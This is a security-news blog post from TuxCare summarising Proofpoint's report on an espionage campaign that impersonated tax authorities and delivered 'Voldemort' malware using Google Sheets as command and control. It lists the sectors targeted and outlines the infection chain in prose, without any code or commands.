ClickCease Espionage Alert: Google Sheets Exploit For Malware Control - TuxCare

Content Table

Join Our Popular Newsletter

Join 4,500+ Linux & Open Source Professionals!

2x a month. No spam.

Espionage Alert: Google Sheets Exploit For Malware Control

Wajahat Raja

September 13, 2024 - TuxCare expert team

A Google Sheets exploit has recently been discovered by cybersecurity experts Proofpoint. As per the initial information, the platform is being leveraged as a command-and-control (C2) mechanism. In this article, we’ll look at what the Google Sheets exploit is about, which sectors are being targeted, and more. Let’s begin!

Google Sheets Exploit: Initial Discovery

The Google Sheets exploit activity was initially detected by Proofpoint on August 5th, 2024. Reports claim that threat actors behind the cyber espionage malware are impersonating tax authorities from various governments worldwide. Some of the government bodies being impersonated pertain to the United States (US) and other countries in Asia and Europe.

As of now, the goal of these Google Sheets exploit attacks is to target 70 organizations worldwide. Threat actors behind these attacks are using a tool called Voldemort to carry out the attacks, given its capabilities of gathering information and delivering any additional payloads. Sectors that have currently been targeted include: 

  • Insurance.
  • Aerospace.
  • Transportation.
  • Academia.
  • Finance.
  • Technology.
  • Industrial.
  • Healthcare.
  • Automotive.
  • Hospitality.
  • Energy.
  • Government.
  • Media.
  • Manufacturing.
  • Telecom.
  • Social benefit organizations

It’s worth mentioning here that 20,000 email messages have already been sent as a part of the attack; the campaign has not been attributed to any specific threat actor.

Tax Authority Impersonation Scam

The 20,000 emails that have been sent falsely claim to be sent from tax authorities in the US, the United Kingdom (UK), Germany, France, Italy, India, and Japan. These emails inform the individuals about a “change” in their tax filing and urge them to click on Google AMP Cache URLs.

These URLs take users to a page where the User-Agent string is inspected to determine if they are using a Windows operating system. If the targeted user is using Windows, the search-ms: URL protocol handler is used to display a Windows shortcut (LNK) file which is disguised as a PDF file, so the users are tricked into launching it.

Providing further details, Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson have stated that:

“If the LNK is executed, it will invoke PowerShell to run Python.exe from a third WebDAV share on the same tunnel (\library\), passing a Python script on a fourth share (\resource\) on the same host as an argument. This causes Python to run the script without downloading any files to the computer, with dependencies being loaded directly from the WebDAV share.”

Those keen on ensuring online protection must know that the Python script is designed to collect and send system information in the form of a Base64-encoded string. Once it’s sent to a threat actor controlled domain, a decoy PDF is shown to the victim and a password-protected ZIP file is downloaded on the system.

The ZIP file contains “CiscoCollabHost.exe,” an executable susceptible to DLL sideloading, and a malicious DLL named “CiscoSparkLauncher.dll.” Voldemort, the tool used to carry out the attack, is written in C and leverages Google Sheets for multiple purposes that include:

  • C2.
  • Data exfiltration.
  • Executing commands from the operators.

As of now, the campaign has been dubbed unusual, meaning that threat actors are likely to zero in on a small group of targets. The approach used in the Google Sheets exploit has been prevalent in other malware families used for initial access. Common examples of these families include Latrodectus, DarkGate, and XWorm.

Conclusion

The Google Sheets exploit marks a sophisticated evolution in cyber espionage tactics, leveraging trusted platforms for malicious control. With multiple sectors targeted and a high level of deception involved, it highlights the critical need for heightened cybersecurity measures, vigilance, and ongoing awareness. The implementation of such protocols can lower the risk of exposure and help ensure protection against advanced threats.

The sources for this piece include articles in The Hacker News and Bleeping Computer.

Looking to automate vulnerability patching without kernel reboots, system downtime, or scheduled maintenance windows?

Learn About Live Patching with TuxCare

Become a TuxCare Guest Writer

Get started

Mail

Join

4,500

Linux & Open Source
Professionals!

Subscribe to
our newsletter